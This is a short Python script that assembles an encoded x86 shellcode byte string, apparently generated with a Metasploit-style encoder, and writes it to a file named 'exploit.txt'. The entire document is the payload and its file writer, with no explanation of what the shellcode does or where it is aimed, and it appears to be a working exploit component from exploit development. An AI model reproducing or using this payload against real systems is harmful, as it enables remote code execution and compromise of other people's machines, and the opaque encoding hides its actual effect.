#!/usr/bin/python3

shellcode =  b""
shellcode += b"\xbb\x7e\x01\xe4\x88\xdb\xca\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12"
shellcode += b"\x83\xbc\x05\x06\x7d\xbc\xee\x44\x7e\x3c\xef"
shellcode += b"\x28\xf6\xd9\xde\x68\x6c\xaa\x71\x59\xe6\xfe"
shellcode += b"\x7d\x12\xaa\xea\xf6\x56\x63\x1d\xbe\xdd\x55"
shellcode += b"\x10\x3f\x4d\xa5\x33\xc3\x8c\xfa\x93\xfa\x5e"
shellcode += b"\x0f\xd2\x3b\x82\xe2\x86\x94\xc8\x51\x36\x90"
shellcode += b"\x85\x69\xbd\xea\x08\xea\x22\xba\x2b\xdb\xf5"
shellcode += b"\xb0\x75\xfb\xf4\x15\x0e\xb2\xee\x7a\x2b\x0c"
shellcode += b"\x85\x49\xc7\x8f\x4f\x80\x28\x23\xae\x2c\xdb"
shellcode += b"\x3d\xf7\x8b\x04\x48\x01\xe8\xb9\x4b\xd6\x92"
shellcode += b"\x65\xd9\xcc\x35\xed\x79\x28\xc7\x22\x1f\xbb"
shellcode += b"\xcb\x8f\x6b\xe3\xcf\x0e\xbf\x98\xf4\x9b\x3e"
shellcode += b"\x4e\x7d\xdf\x64\x4a\x25\xbb\x05\xcb\x83\x6a"
shellcode += b"\x39\x0b\x6c\xd2\x9f\x40\x81\x07\x92\x0b\xce"
shellcode += b"\xe4\x9f\xb3\x0e\x63\x97\xc0\x3c\x2c\x03\x4e"
shellcode += b"\x0d\xa5\x8d\x89\x72\x9c\x6a\x05\x8d\x1f\x8b"
shellcode += b"\x0c\x4a\x4b\xdb\x26\x7b\xf4\xb0\xb6\x84\x21"
shellcode += b"\x16\xe6\x2a\x9a\xd7\x56\x8b\x4a\xb0\xbc\x04"
shellcode += b"\xb4\xa0\xbf\xce\xdd\x4b\x3a\x99\x21\x23\x33"
shellcode += b"\xf7\xca\x36\xbb\x06\xb0\xbe\x5d\x62\xd6\x96"
shellcode += b"\xf6\x1b\x4f\xb3\x8c\xba\x90\x69\xe9\xfd\x1b"
shellcode += b"\x9e\x0e\xb3\xeb\xeb\x1c\x24\x1c\xa6\x7e\xe3"
shellcode += b"\x23\x1c\x16\x6f\xb1\xfb\xe6\xe6\xaa\x53\xb1"
shellcode += b"\xaf\x1d\xaa\x57\x42\x07\x04\x45\x9f\xd1\x6f"
shellcode += b"\xcd\x44\x22\x71\xcc\x09\x1e\x55\xde\xd7\x9f"
shellcode += b"\xd1\x8a\x87\xc9\x8f\x64\x6e\xa0\x61\xde\x38"
shellcode += b"\x1f\x28\xb6\xbd\x53\xeb\xc0\xc1\xb9\x9d\x2c"
shellcode += b"\x73\x14\xd8\x53\xbc\xf0\xec\x2c\xa0\x60\x12"
shellcode += b"\xe7\x60\x90\x59\xa5\xc1\x39\x04\x3c\x50\x24"
shellcode += b"\xb7\xeb\x97\x51\x34\x19\x68\xa6\x24\x68\x6d"
shellcode += b"\xe2\xe2\x81\x1f\x7b\x87\xa5\x8c\x7c\x82"

f = open("exploit.txt", "wb")
f.write(shellcode)
f.close()
